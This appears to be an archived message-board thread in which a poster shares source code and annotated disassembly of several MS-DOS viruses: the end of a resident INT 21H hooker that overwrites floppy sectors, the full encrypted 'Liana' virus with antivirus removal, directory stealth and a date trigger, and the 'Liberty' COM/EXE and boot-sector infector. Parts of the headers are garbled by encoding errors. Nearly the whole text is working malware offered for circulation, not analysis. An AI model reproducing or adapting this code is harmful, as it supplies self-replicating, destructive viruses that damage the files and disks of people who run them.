MOV AH,19H ; Get current disk function
INT 44H ; DOS service (diverted INT 21H)
MOV BX,OFFSET PATHNM ; Address pathname
MOV DL,[BX] ; Get drive letter from pathname
CMP DL,'A' ; Is drive letter 'A'?
JE BP0120 ; Branch if yes
CMP DL,'a' ; Is drive letter 'a'?
JE BP0120 ; Branch if yes
CMP DL,'b' ; Is drive letter 'b'?
JE BP0130 ; Branch if yes
CMP DL,'B' ; Is drive letter 'B'?
JE BP0130 ; Branch if yes
JMP BP0160 ; Restore registers and terminate

; Drive A

BP0120: MOV DL,0 ; Set drive A
JMP BP0140

; Drive B

BP0130: MOV DL,1 ; Set drive B
BP0140: CMP AL,DL ; Is this the same as current?
JNE BP0150 ; Branch if not
JMP BP0160 ; Restore registers and terminate

; Write lump of BIOS to floppy disk

BP0150: MOV SI,0FE00H ; \ Address BIOS (?)
MOV DS,SI ; /
MOV CX,0020H ; Write 32 sectors
MOV DX,1 ; Start at sector one
INT 26H ; Absolute disk write
POPF
MOV AH,9 ; Display string function
MOV DX,1840H
INT 44H ; DOS service (diverted INT 21H)
BP0160: POP DI
POP DX
POP CX
POP DS
BP0170: POP BX
POP AX
JMP CS:INT_21 ; Branch to original Int 21H

; Original Int 21H vector

INT_21 EQU THIS DWORD
DW 138DH ; Int 21H offset
DW 0295H ; Int 21H segment

; Entry point for infected program

BP0180: CALL BP0190 ; \ Get current address
BP0190: POP SI ; /
SUB SI,3 ; Address back to BP0180
MOV BX,SI ; \ Address of virus start
SUB BX,OFFSET BP0180 ; /
PUSH BX ; Save address of virus start
ADD BX,OFFSET FILELN ; Address file length
MOV AH,19H ; Get current disk function
INT 21H ; DOS service
MOV [BX-1],AL ; Save current disk
MOV AX,[BX] ; Get file length
ADD AX,0100H ; Add PSP length
MOV CL,4 ; \ Convert to paragraphs
SHR AX,CL ; /
INC AX ; Allow for remainder
MOV BX,AX ; Copy paragraphs to keep
MOV AH,4AH ; Set block function
INT 21H ; DOS service
JNB BP0200 ; Branch if no error
JMP BP0220 ; Pass control to host

; Allocate memory for virus

BP0200: MOV CL,4 ; Bits to move
MOV DX,OFFSET ENDADR ; Length of virus
SHR DX,CL ; Convert to paragraphs
INC DX ; Allow for remainder
MOV BX,DX ; Copy paragraphs for virus
MOV AH,48H ; Allocate memory function
INT 21H ; DOS service
JNB BP0210 ; Branch if no error
JMP BP0220 ; Pass control to host

; Install virus in memory

BP0210: PUSH ES
PUSH AX ; Preserve allocated memory segment
MOV AX,3521H ; Get Int 21H function
INT 21H ; DOS service
MOV [SI-4],BX ; Save Int 21H offset
MOV [SI-2],ES ; Save Int 21H segment
POP ES ; Recover allocated memory segment
PUSH SI
SUB SI,OFFSET BP0180 ; Address back to start of virus
XOR DI,DI ; Target start of new area
MOV CX,OFFSET ENDADR ; \ Length of virus
INC CX ; /
REPZ MOVSB ; Copy virus to new area
POP SI
PUSH DS
MOV DX,[SI-4] ; Get Int 21H offset
MOV AX,[SI-2] ; \ Set DS to Int 21H segment
MOV DS,AX ; /
MOV AX,2544H ; Set Int 44H function
INT 21H ; DOS service
PUSH ES ; \ Set DS to ES
POP DS ; /
XOR DX,DX ; Interrupt 21H routine (BP0010)
MOV AX,2521H ; Set Int 21H function
INT 44H ; DOS service (diverted INT 21H)
POP DS
POP ES
BP0220: POP BX
PUSH ENTPTR[BX] ; Push COM file entry address
RET ; ...and return to it

PATHNM DB 'b:\command.com', 0 ; Pathname
BUFFER DB 7FH, 58H, 0BH, 0, 0 ; Read buffer
ENTPTR DW 0CB0H ; File entry address
N_AORB DB 0 ; "Not A or B" switch
INFCNT DB 0 ; Infection count
DB 0
CURDSK DB 0 ; Current disk
FILELN DW 5AAAH ; File length
DW 65A9H ; Infection indicator

ENDADR EQU $-1

CODE ENDS

END

; €€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€
; €€€€€€€€€€€€€€€€€€€€> and Remember Don't Forget to Call <€€€€€€€€€€€€€€€€
; €€€€€€€€€€€€> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <€€€€€€€€€€
; €€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€

Hص ر ×زدؤإ ×سإ سثءعءج... يدضإش إفإ قشد ؤدآء×جہ ذدشدح...
[–] ًدثء _All_ !

ژ،ڈ،پ،ژ،پپ،، DreamLand laboratory. P2Pirates<dog>Mail.ru ICQ 638-547-576
2،5080ژ244،0 FTP://87.224.224.182

... ïخ خإس عخءحر ×ظسدثد - خإ بدشإج إاد ×ةؤإشط.

John Zaicev

unread,

May 18, 2012, 5:05:05 PM5/18/12

to

[–] πΙΧΕΤ _All_ !

;‚€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€ƒ

; THiS iS a [NuKE] RaNDoMiC LiFe GeNeRaToR ViRuS. [NuKE] PoWeR
; CReaTeD iS a N.R.L.G. PRoGRaM V0.66 BeTa TeST VeRSioN [NuKE] WaReZ
; auToR: aLL [NuKE] MeMeBeRS [NuKE] PoWeR
; [NuKE] THe ReaL PoWeR! [NuKE] WaReZ
; NRLG WRiTTeR: AZRAEL (C) [NuKE] 1994 [NuKE] PoWeR
;„€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€…

; Liana Virus, created by Gehenna on 20 May 96!

.286

code segment
assume cs:code,ds:code

org 100h

start: CALL NEXT

NEXT:
mov di,sp ;take the stack pointer location
mov bp,ss:[di] ;take the "DELTA HANDLE" for my virus
sub bp,offset next ;subtract the large code off this code
;
;*******************************************************************
; #1 DECRYPT ROUTINE
;*******************************************************************

cmp byte ptr cs:[crypt],0b9h ;is the first runnig?
je crypt2 ;yes! not decrypt
;----------------------------------------------------------
mov cx,offset fin ;cx = large of virus
lea di,[offset crypt]+ bp ;di = first byte to decrypt
mov dx,1 ;dx = value for decrypt
;----------------------------------------------------------
deci: ;deci = fuck label!
;----------------------------------------------------------

sub byte ptr [di],07ch
not byte ptr [di]
xor word ptr [di],03c11h
xor byte ptr [di],069h
xor byte ptr [di],0ch
xor byte ptr [di],0a2h
not word ptr [di]
add word ptr [di],05875h
inc word ptr [di]
add byte ptr [di],049h
add word ptr [di],0ecb8h
xor byte ptr [di],0f8h
add byte ptr [di],083h
not word ptr [di]
add byte ptr [di],02h

call ANTI_V

cmp ah,11h
je dir
cmp ah,12h
je dir

dirsal:
cmp AX,0CACAH ;is ... a caca function? (resident chek)
jne a3 ;no! jump to a3
mov bh,0cah ;yes! put ca in bh
a3: ;
JMP dword ptr CS:[INT21] ;jmp to original int 21h
ret ;

make db 'N.R.L.G. by Gehenna'

dir:
jmp dir_s
;-------------------------------------------------------------
REPRODUCCION: ;
;
pushf ;put the register
pusha ;in the stack
push si ;
push di ;
push bp ;
push es ;
push ds ;
;-------------------------------------------------------------

push cs ;
pop ds ;

sub byte ptr [di],02h
not word ptr [di]
sub byte ptr [di],083h
xor byte ptr [di],0f8h
sub word ptr [di],0ecb8h
sub byte ptr [di],049h
dec word ptr [di]
sub word ptr [di],05875h
not word ptr [di]
xor byte ptr [di],0a2h
xor byte ptr [di],0ch
xor byte ptr [di],069h
xor word ptr [di],03c11h
not byte ptr [di]
add byte ptr [di],07ch

;---------------------------------
action: ;Call label
MOV AH,2AH ;
INT 21H ;get date
CMP Dl,byte ptr cs:[action_dia+bp] ;is equal to my day?
JE cont ;nop! fuck ret
cmp byte ptr cs:[action_dia+bp],32 ;
jne no_day ;
cont: ;
cmp dh,byte ptr cs:[action_mes+bp] ;is equal to my month?
je set ;
cmp byte ptr cs:[action_mes+bp],13 ;
jne NO_DAY ;nop! fuck ret
set: ;
mov AH,9 ;yeah!!
MOV DX,OFFSET PAO ;print my text!
INT 21H ;now!
INT 20H ;an finsh te program
NO_DAY: ;label to incorrect date
ret ;return from call
;---------------------------------

PAO:

DB 10,13,'Dedicated to Liana. 20 May 96','$'

;---------------------------------
ANTI_V: ;
MOV AX,0FA01H ;REMOVE VSAFE FROM MEMORY
MOV DX,5945H ;
INT 21H ;
ret ;
;---------------------------------

;*****************************************************
dir_s:
pushf
push cs
call a3 ;Get file Stats
test al,al ;Good FCB?
jnz no_good ;nope

push ax
push bx
push es

mov ah,51h ;Is this Undocmented? huh...
int 21h
mov es,bx
cmp bx,es:[16h]
jnz not_infected
mov bx,dx
mov al,[bx]
push ax
mov ah,2fh ;Get file DTA
int 21h
pop ax
inc al
jnz fcb_okay
add bx,7h
fcb_okay: mov ax,es:[bx+17h]
and ax,1fh ;UnMask Seconds Field
xor al,byte ptr cs:fechad
jnz not_infected
and byte ptr es:[bx+17h],0e0h
sub es:[bx+1dh],OFFSET FIN - OFFSET START ;Yes minus virus
size
sbb es:[bx+1fh],ax

not_infected:pop es
pop bx
pop ax

no_good: iret
;********************************************************************
; THIS DIR STEALTH METOD IS EXTRAC FROM NUKEK INFO JOURNAL 4 & N-POX
;*********************************************************************

action_dia Db 014H ;day for the action
action_mes Db 05H ;month for the action

FECHA DW 01eH ;Secon for mark
FECHAd Db 01eH ;Secon for mark dir st
fin:
code ends
end start

HΥ Ρ ΧΟΔΕ ΧΣΕ ΣΛΑΪΑΜ... νΟΦΕΤ ΕέΕ ήΤΟ ΔΟΒΑΧΜΐ ΠΟΤΟΝ...
[–] πΟΛΑ _All_ !

΅ ΅ ΅ ΅ ΅΅ DreamLand laboratory. P2Pirates<dog>Mail.ru ICQ 638-547-576
2΅5080 244΅0 FTP://87.224.224.182

... λΟΞΕΓ - ΤΕΜΥ ΧΕΞΕΓ.

John Zaicev

unread,

May 18, 2012, 5:05:26 PM5/18/12

to

[–] ًزة×إش _All_ !

CS:0110 EB79 JMP 018B
CS:0112 90 NOP
;
; The program's original infomation is stored between these sections
;
CS:018B 2E CS:
CS:018C 803E090201 CMP BYTE PTR [0209],01 ; .EXE file ?
CS:0191 7403 JZ 0196
CS:0193 1F POP DS
CS:0194 59 POP CX
CS:0195 5B POP BX
CS:0196 50 PUSH AX
CS:0197 53 PUSH BX
CS:0198 51 PUSH CX
CS:0199 52 PUSH DX
CS:019A 1E PUSH DS
CS:019B 06 PUSH ES
CS:019C 1E PUSH DS
CS:019D 0E PUSH CS
CS:019E 1F POP DS
CS:019F E8CD00 CALL 026F ; Installation check
CS:01A2 3DFFFF CMP AX,FFFF
CS:01A5 741A JZ 01C1
CS:01A7 E8D700 CALL 0281 ; Get vector 21h
CS:01AA 07 POP ES
CS:01AB 06 PUSH ES
CS:01AC 8CC0 MOV AX,ES
CS:01AE 48 DEC AX
CS:01AF 8ED8 MOV DS,AX
CS:01B1 E8DC00 CALL 0290 ; Adjust MCB
CS:01B4 8EC0 MOV ES,AX
CS:01B6 0E PUSH CS
CS:01B7 1F POP DS
CS:01B8 E8EC00 CALL 02A7 ; Move to Upper Memory
CS:01BB E8F400 CALL 02B2 ; Set vector 21h
CS:01BE E80101 CALL 02C2 ; Set installation flag
CS:01C1 2E CS:
CS:01C2 803E090201 CMP BYTE PTR [0209],01 ; .EXE file ?
CS:01C7 7417 JZ 01E0
CS:01C9 07 POP ES
CS:01CA 0E PUSH CS
CS:01CB 1F POP DS
CS:01CC E80901 CALL 02D8 ; Decrypt header
CS:01CF E81901 CALL 02EB ; Restore header
CS:01D2 07 POP ES
CS:01D3 1F POP DS
CS:01D4 5A POP DX
CS:01D5 59 POP CX
CS:01D6 5B POP BX
CS:01D7 58 POP AX
CS:01D8 1E PUSH DS
CS:01D9 BF0001 MOV DI,0100
CS:01DC 57 PUSH DI
CS:01DD 33FF XOR DI,DI
CS:01DF CB RETF ; Start file
CS:01E0 FA CLI
CS:01E1 5E POP SI
CS:01E2 07 POP ES
CS:01E3 1F POP DS
CS:01E4 5A POP DX
CS:01E5 59 POP CX
CS:01E6 5B POP BX
CS:01E7 58 POP AX
CS:01E8 2E CS:
CS:01E9 8B3E2C06 MOV DI,[062C]
CS:01ED 03FE ADD DI,SI
CS:01EF 8ED7 MOV SS,DI
CS:01F1 2E CS:
CS:01F2 8B3E2E06 MOV DI,[062E]
CS:01F6 8BE7 MOV SP,DI ; Restore stack
CS:01F8 2E CS:
CS:01F9 8B3E2806 MOV DI,[0628]
CS:01FD 03FE ADD DI,SI
CS:01FF 57 PUSH DI
CS:0200 2E CS:
CS:0201 FF362A06 PUSH [062A]
CS:0205 33F6 XOR SI,SI
CS:0207 EBD4 JMP 01DD ; Start file
;
; The encrypted Liberty header for .COM files
;
DS:0200 1D 69 D9 00 01 01
DS:0210 80 80 40 40 20 20 10 10-08 08 A4 05 D2 04 C9 02
DS:0220 4C 81 A8 40 49 20 21 90-0B 48 E8 69 95 05 4A 92
DS:0230 21 1D 40 A8 43 28 90 14-4E 4C 07 27 D3 22 81 81
DS:0240 C0 B0 40 C4 79 20 90 29-5C D0 AE 69 57 35 2B 9A
DS:0250 31 CD 34 40 51 53 AE 5D-62 C0 E3 C1 B0 35 58 F6
DS:0260 46 E5 20 02
;
; Various subroutines used by the virus
;
CS:026F 2E CS:
CS:0270 8A1E6A02 MOV BL,[026A]
CS:0274 32FF XOR BH,BH
CS:0276 33C0 XOR AX,AX
CS:0278 8ED8 MOV DS,AX
CS:027A D1E3 SHL BX,1
CS:027C D1E3 SHL BX,1
CS:027E 8B07 MOV AX,[BX]
CS:0280 C3 RET
CS:0281 A18400 MOV AX,[0084]
CS:0284 2E CS:
CS:0285 A38C03 MOV [038C],AX
CS:0288 A18600 MOV AX,[0086]
CS:028B 2E CS:
CS:028C A38E03 MOV [038E],AX
CS:028F C3 RET
CS:0290 BB4221 MOV BX,2142
CS:0293 B104 MOV CL,04
CS:0295 D3EB SHR BX,CL
CS:0297 291E0300 SUB [0003],BX
CS:029B A10300 MOV AX,[0003]
CS:029E 03060100 ADD AX,[0001]
CS:02A2 A31200 MOV [0012],AX
CS:02A5 40 INC AX
CS:02A6 C3 RET
CS:02A7 BF1001 MOV DI,0110
CS:02AA 8BF7 MOV SI,DI
CS:02AC B99A05 MOV CX,059A
CS:02AF F3 REPZ
CS:02B0 A5 MOVSW
CS:02B1 C3 RET
CS:02B2 33C0 XOR AX,AX
CS:02B4 8ED8 MOV DS,AX
CS:02B6 FA CLI
CS:02B7 B86C03 MOV AX,036C
CS:02BA A38400 MOV [0084],AX
CS:02BD 8C068600 MOV [0086],ES
CS:02C1 C3 RET
CS:02C2 FA CLI
CS:02C3 B8FFFF MOV AX,FFFF
CS:02C6 2E CS:
CS:02C7 8A1E6A02 MOV BL,[026A]
CS:02CB 32FF XOR BH,BH
CS:02CD D1E3 SHL BX,1
CS:02CF D1E3 SHL BX,1
CS:02D1 8907 MOV [BX],AX
CS:02D3 40 INC AX
CS:02D4 894702 MOV [BX+02],AX
CS:02D7 C3 RET
CS:02D8 B93C00 MOV CX,003C
CS:02DB BE1301 MOV SI,0113
CS:02DE 2E CS:
CS:02DF 8B14 MOV DX,[SI]
CS:02E1 D3CA ROR DX,CL
CS:02E3 2E CS:
CS:02E4 8914 MOV [SI],DX
CS:02E6 46 INC SI
CS:02E7 46 INC SI
CS:02E8 E2F4 LOOP 02DE
CS:02EA C3 RET
CS:02EB BF0001 MOV DI,0100
CS:02EE BE1301 MOV SI,0113
CS:02F1 B93C00 MOV CX,003C
CS:02F4 F3 REPZ
CS:02F5 A5 MOVSW
CS:02F6 C3 RET
;
; I am not sure what the next routine is supposed to be doing.
;
CS:02F7 9C PUSHF
CS:02F8 2E CS:
CS:02F9 803E100301 CMP BYTE PTR [0310],01
CS:02FE 740A JZ 030A
CS:0300 80FC03 CMP AH,03
CS:0303 7505 JNZ 030A
CS:0305 80FA80 CMP DL,80
CS:0308 7207 JB 0311
CS:030A 9D POPF
CS:030B EA00000000 JMP 0000:0000
CS:0311 06 PUSH ES
CS:0312 0E PUSH CS
CS:0313 07 POP ES
CS:0314 B80902 MOV AX,0209
CS:0317 BB420C MOV BX,0C42
CS:031A B90100 MOV CX,0001
CS:031D 9C PUSHF
CS:031E 2E CS:
CS:031F FF1E0C03 CALL FAR [030C]
CS:0323 72E5 JB 030A
CS:0325 B80905 MOV AX,0509
CS:0328 BB4803 MOV BX,0348
CS:032B B93100 MOV CX,0031
CS:032E 9C PUSHF
CS:032F 2E CS:
CS:0330 FF1E0C03 CALL FAR [030C]
CS:0334 72D4 JB 030A
CS:0336 B80903 MOV AX,0309
CS:0339 BB420C MOV BX,0C42
CS:033C B93100 MOV CX,0031
CS:033F 9C PUSHF
CS:0340 2E CS:
CS:0341 FF1E0C03 CALL FAR [030C]
CS:0345 07 POP ES
CS:0346 9D POPF
CS:0347 CF IRET
;
; Another format table used by the virus
;
DS:0340 00 00 31 02 00 00 32 02
DS:0350 00 00 33 02 00 00 34 02-00 00 35 02 00 00 36 02
DS:0360 00 00 37 02 00 00 38 02-00 00 39 02
;
; The virus infects files by monitoring function 4Bh of vector 21h
;
CS:036C 9C PUSHF
CS:036D 3D004B CMP AX,4B00 ; Execute function ?
CS:0370 741E JZ 0390
CS:0372 EB16 JMP 038A
CS:0374 90 NOP
CS:0375 E8B901 CALL 0531 ; Close file
CS:0378 E89A00 CALL 0415 ; Restore vectors
CS:037B C6060C04FF MOV BYTE PTR [040C],FF
CS:0380 90 NOP
CS:0381 9D POPF
CS:0382 07 POP ES
CS:0383 1F POP DS
CS:0384 5F POP DI
CS:0385 5E POP SI
CS:0386 5A POP DX
CS:0387 59 POP CX
CS:0388 5B POP BX
CS:0389 58 POP AX
CS:038A 9D POPF
CS:038B EA77142C02 JMP 022C:1477 ; Continue
CS:0390 50 PUSH AX
CS:0391 53 PUSH BX
CS:0392 51 PUSH CX
CS:0393 52 PUSH DX
CS:0394 56 PUSH SI
CS:0395 57 PUSH DI
CS:0396 1E PUSH DS
CS:0397 06 PUSH ES
CS:0398 9C PUSHF
CS:0399 E8A600 CALL 0442 ; Set error vectors
CS:039C E8E100 CALL 0480 ; Open file
CS:039F 72D4 JB 0375
CS:03A1 0E PUSH CS
CS:03A2 1F POP DS
CS:03A3 0E PUSH CS
CS:03A4 07 POP ES
CS:03A5 A30A04 MOV [040A],AX
CS:03A8 93 XCHG BX,AX
CS:03A9 C6060C0401 MOV BYTE PTR [040C],01
CS:03AE 90 NOP
CS:03AF E8D800 CALL 048A ; Read file header
CS:03B2 72C1 JB 0375
CS:03B4 BB1301 MOV BX,0113
CS:03B7 2E CS:
CS:03B8 813F4D5A CMP WORD PTR [BX],5A4D ; .EXE file ?
CS:03BC 7505 JNZ 03C3
CS:03BE E8C001 CALL 0581 ; Adapt header
CS:03C1 EBB2 JMP 0375
CS:03C3 2E CS:
CS:03C4 C606090200 MOV BYTE PTR [0209],00 ; Set switch
CS:03C9 E8CD00 CALL 0499 ; Check infection
CS:03CC 74A7 JZ 0375
CS:03CE E8DD00 CALL 04AE ; Encrypt header
CS:03D1 E8EB00 CALL 04BF ; Move to EOF
CS:03D4 729F JB 0375
CS:03D6 83FA00 CMP DX,+00 ;
CS:03D9 759A JNZ 0375 ;
CS:03DB 3D0005 CMP AX,0500 ;
CS:03DE 7295 JB 0375 ;
CS:03E0 3DFFEF CMP AX,EFFF ;
CS:03E3 7390 JNB 0375 ; Check file size
CS:03E5 E8EA00 CALL 04D2 ; Move to next paragraph
CS:03E8 728B JB 0375
CS:03EA E80701 CALL 04F4 ; Write virus
CS:03ED 7286 JB 0375
CS:03EF 3BC1 CMP AX,CX
CS:03F1 7C11 JL 0404
CS:03F3 E81301 CALL 0509 ; Move to BOF
CS:03F6 7209 JB 0401
CS:03F8 E86201 CALL 055D ; Decrypt Libery header
CS:03FB E81E01 CALL 051C ; Write Liberty header
CS:03FE E86F01 CALL 0570 ; Encrypt Liberty Header
CS:0401 E971FF JMP 0375
CS:0404 E83801 CALL 053F ; Set & get vector 13h
CS:0407 E96BFF JMP 0375
;
; Revectoring of error vectors.
;
CS:0415 1E PUSH DS
CS:0416 33DB XOR BX,BX
CS:0418 8EDB MOV DS,BX
CS:041A FA CLI
CS:041B 2E CS:
CS:041C 8B1E0D04 MOV BX,[040D]
CS:0420 891E8C00 MOV [008C],BX
CS:0424 2E CS:
CS:0425 8B1E0F04 MOV BX,[040F]
CS:0429 891E8E00 MOV [008E],BX
CS:042D FA CLI
CS:042E 2E CS:
CS:042F 8B1E1104 MOV BX,[0411]
CS:0433 891E9000 MOV [0090],BX
CS:0437 2E CS:
CS:0438 8B1E1304 MOV BX,[0413]
CS:043C 891E8E00 MOV [008E],BX
CS:0440 1F POP DS
CS:0441 C3 RET
CS:0442 1E PUSH DS
CS:0443 33DB XOR BX,BX
CS:0445 8EDB MOV DS,BX
CS:0447 8B1E8C00 MOV BX,[008C]
CS:044B 2E CS:
CS:044C 891E0D04 MOV [040D],BX
CS:0450 8B1E8E00 MOV BX,[008E]
CS:0454 2E CS:
CS:0455 891E0F04 MOV [040F],BX
CS:0459 FA CLI
CS:045A BB3106 MOV BX,0631
CS:045D 891E8C00 MOV [008C],BX
CS:0461 8C0E8E00 MOV [008E],CS
CS:0465 8B1E9000 MOV BX,[0090]
CS:0469 2E CS:
CS:046A 891E1104 MOV [0411],BX
CS:046E 8B1E9200 MOV BX,[0092]
CS:0472 FA CLI
CS:0473 BB3206 MOV BX,0632
CS:0476 891E9000 MOV [0090],BX
CS:047A 8C0E9200 MOV [0092],CS
CS:047E 1F POP DS
CS:047F C3 RET
;
; Various subroutines used by the virus
;
CS:0480 B8023D MOV AX,3D02
CS:0483 9C PUSHF
CS:0484 2E CS:
CS:0485 FF1E8C03 CALL FAR [038C]
CS:0489 C3 RET
CS:048A B43F MOV AH,3F
CS:048C B97800 MOV CX,0078
CS:048F BA1301 MOV DX,0113
CS:0492 9C PUSHF
CS:0493 2E CS:
CS:0494 FF1E8C03 CALL FAR [038C]
CS:0498 C3 RET
CS:0499 BF1301 MOV DI,0113
CS:049C 81C76802 ADD DI,0268
CS:04A0 81EF0A02 SUB DI,020A
CS:04A4 BE6802 MOV SI,0268
CS:04A7 FC CLD
CS:04A8 B90700 MOV CX,0007
CS:04AB F3 REPZ
CS:04AC A6 CMPSB
CS:04AD C3 RET
CS:04AE B93C00 MOV CX,003C
CS:04B1 BE1301 MOV SI,0113
CS:04B4 8B14 MOV DX,[SI]
CS:04B6 D3C2 ROL DX,CL
CS:04B8 8914 MOV [SI],DX
CS:04BA 46 INC SI
CS:04BB 46 INC SI
CS:04BC E2F6 LOOP 04B4
CS:04BE C3 RET
CS:04BF B80242 MOV AX,4202
CS:04C2 2E CS:
CS:04C3 8B1E0A04 MOV BX,[040A]
CS:04C7 33C9 XOR CX,CX
CS:04C9 33D2 XOR DX,DX
CS:04CB 9C PUSHF
CS:04CC 2E CS:
CS:04CD FF1E8C03 CALL FAR [038C]
CS:04D1 C3 RET
CS:04D2 B90400 MOV CX,0004
CS:04D5 D3E8 SHR AX,CL
CS:04D7 BB6602 MOV BX,0266
CS:04DA 8907 MOV [BX],AX
CS:04DC 40 INC AX
CS:04DD B90400 MOV CX,0004
CS:04E0 D3E0 SHL AX,CL
CS:04E2 92 XCHG DX,AX
CS:04E3 33C9 XOR CX,CX
CS:04E5 B80042 MOV AX,4200
CS:04E8 2E CS:
CS:04E9 8B1E0A04 MOV BX,[040A]
CS:04ED 9C PUSHF
CS:04EE 2E CS:
CS:04EF FF1E8C03 CALL FAR [038C]
CS:04F3 C3 RET
CS:04F4 B9330B MOV CX,0B33
CS:04F7 B80040 MOV AX,4000
CS:04FA BA1001 MOV DX,0110
CS:04FD 2E CS:
CS:04FE 8B1E0A04 MOV BX,[040A]
CS:0502 9C PUSHF
CS:0503 2E CS:
CS:0504 FF1E8C03 CALL FAR [038C]
CS:0508 C3 RET
CS:0509 B80042 MOV AX,4200
CS:050C 2E CS:
CS:050D 8B1E0A04 MOV BX,[040A]
CS:0511 33C9 XOR CX,CX
CS:0513 33D2 XOR DX,DX
CS:0515 9C PUSHF
CS:0516 2E CS:
CS:0517 FF1E8C03 CALL FAR [038C]
CS:051B C3 RET
CS:051C BA0A02 MOV DX,020A
CS:051F B80040 MOV AX,4000
CS:0522 2E CS:
CS:0523 8B1E0A04 MOV BX,[040A]
CS:0527 B97800 MOV CX,0078
CS:052A 9C PUSHF
CS:052B 2E CS:
CS:052C FF1E8C03 CALL FAR [038C]
CS:0530 C3 RET
CS:0531 B43E MOV AH,3E
CS:0533 2E CS:
CS:0534 8B1E0A04 MOV BX,[040A]
CS:0538 9C PUSHF
CS:0539 2E CS:
CS:053A FF1E8C03 CALL FAR [038C]
CS:053E C3 RET
CS:053F 33C0 XOR AX,AX
CS:0541 8ED8 MOV DS,AX
CS:0543 FA CLI
CS:0544 A14C00 MOV AX,[004C]
CS:0547 2E CS:
CS:0548 A31407 MOV [0714],AX
CS:054B A14E00 MOV AX,[004E]
CS:054E 2E CS:
CS:054F A31607 MOV [0716],AX
CS:0552 B8F906 MOV AX,06F9
CS:0555 A34C00 MOV [004C],AX
CS:0558 8C0E4E00 MOV [004E],CS
CS:055C C3 RET
;
; Header encrypting
;
CS:055D B92D00 MOV CX,002D
CS:0560 BE0A02 MOV SI,020A
CS:0563 2E CS:
CS:0564 8B3C MOV DI,[SI]
CS:0566 D3CF ROR DI,CL
CS:0568 2E CS:
CS:0569 893C MOV [SI],DI
CS:056B 46 INC SI
CS:056C 46 INC SI
CS:056D E2F4 LOOP 0563
CS:056F C3 RET
CS:0570 BE0A02 MOV SI,020A
CS:0573 B92D00 MOV CX,002D
CS:0576 8B3C MOV DI,[SI]
CS:0578 D3C7 ROL DI,CL
CS:057A 893C MOV [SI],DI
CS:057C 46 INC SI
CS:057D 46 INC SI
CS:057E E2F6 LOOP 0576
CS:0580 C3 RET
;
; .EXE file handling
;
CS:0581 8B7F02 MOV DI,[BX+02]
CS:0584 83FFFF CMP DI,-01 ; Check infection
CS:0587 7439 JZ 05C2
CS:0589 8B7F16 MOV DI,[BX+16]
CS:058C 83C710 ADD DI,+10
CS:058F 893E2806 MOV [0628],DI
CS:0593 8B7F14 MOV DI,[BX+14]
CS:0596 893E2A06 MOV [062A],DI
CS:059A 8B7F0E MOV DI,[BX+0E]
CS:059D 83C710 ADD DI,+10
CS:05A0 893E2C06 MOV [062C],DI
CS:05A4 8B7F10 MOV DI,[BX+10]
CS:05A7 893E2E06 MOV [062E],DI
CS:05AB BF1001 MOV DI,0110
CS:05AE 897F14 MOV [BX+14],DI ; Set IP
CS:05B1 BF420D MOV DI,0D42
CS:05B4 897F10 MOV [BX+10],DI ; Set SP
CS:05B7 2E CS:
CS:05B8 C606090201 MOV BYTE PTR [0209],01 ; Set switch
CS:05BD E8FFFE CALL 04BF ; Move to EOF
CS:05C0 7301 JNB 05C3
CS:05C2 C3 RET
CS:05C3 83FA0A CMP DX,+0A ;
CS:05C6 77FA JA 05C2 ; Check file size
CS:05C8 B104 MOV CL,04
CS:05CA D3E8 SHR AX,CL
CS:05CC 40 INC AX
CS:05CD 3D0010 CMP AX,1000
CS:05D0 7501 JNZ 05D3
CS:05D2 42 INC DX
CS:05D3 D3E0 SHL AX,CL
CS:05D5 50 PUSH AX
CS:05D6 52 PUSH DX
CS:05D7 B91000 MOV CX,0010
CS:05DA F7F1 DIV CX
CS:05DC BB1301 MOV BX,0113
CS:05DF 2D1100 SUB AX,0011
CS:05E2 8B7F08 MOV DI,[BX+08]
CS:05E5 2BC7 SUB AX,DI
CS:05E7 894716 MOV [BX+16],AX ; Set CodeSegment
CS:05EA 89470E MOV [BX+0E],AX ; Set StackSegment
CS:05ED 59 POP CX
CS:05EE 5A POP DX
CS:05EF E8F3FE CALL 04E5 ; Move to next paragraph
CS:05F2 722F JB 0623
CS:05F4 E8FDFE CALL 04F4 ; Write virus
CS:05F7 722A JB 0623
CS:05F9 3BC1 CMP AX,CX
CS:05FB 7C27 JL 0624
CS:05FD E8BFFE CALL 04BF ; Move to BOF
CS:0600 7221 JB 0623
CS:0602 B90002 MOV CX,0200
CS:0605 F7F1 DIV CX
CS:0607 83FA00 CMP DX,+00
CS:060A 7401 JZ 060D
CS:060C 40 INC AX
CS:060D BB1301 MOV BX,0113
CS:0610 894704 MOV [BX+04],AX ; Set blocks
CS:0613 C74702FFFF MOV WORD PTR [BX+02],FFFF ; Set infection mark
CS:0618 E8EEFE CALL 0509 ; Move to BOF
CS:061B 7206 JB 0623
CS:061D BA1301 MOV DX,0113
CS:0620 E8FCFE CALL 051F ; Write header
CS:0623 C3 RET
CS:0624 E818FF CALL 053F ; Set & get vector 13h
CS:0627 C3 RET
;
; Error vectors
;
CS:0631 CF IRET ; Error vector 23h
CS:0632 32C0 XOR AL,AL ;
CS:0634 CF IRET ; Error vector 24h
;
; The next part is the virus's bootsector
;
CS:0635 EB01 JMP 0638
CS:0637 90 NOP
CS:0638 33C0 XOR AX,AX
CS:063A 8ED0 MOV SS,AX
CS:063C BC007C MOV SP,7C00
CS:063F 33C0 XOR AX,AX
CS:0641 8EC0 MOV ES,AX
CS:0643 BB1304 MOV BX,0413 ;
CS:0646 26 ES: ;
CS:0647 8B07 MOV AX,[BX] ;
CS:0649 2D0A00 SUB AX,000A ;
CS:064C B106 MOV CL,06 ;
CS:064E 26 ES: ;
CS:064F 8907 MOV [BX],AX ; Decrease memory
CS:0651 D3E0 SHL AX,CL
CS:0653 8EC0 MOV ES,AX
CS:0655 B80802 MOV AX,0208 ;
CS:0658 BB1001 MOV BX,0110 ;
CS:065B B93128 MOV CX,2831 ;
CS:065E 33D2 XOR DX,DX ;
CS:0660 CD13 INT 13 ; Read virus
CS:0662 06 PUSH ES
CS:0663 BB6806 MOV BX,0668
CS:0666 53 PUSH BX
CS:0667 CB RETF
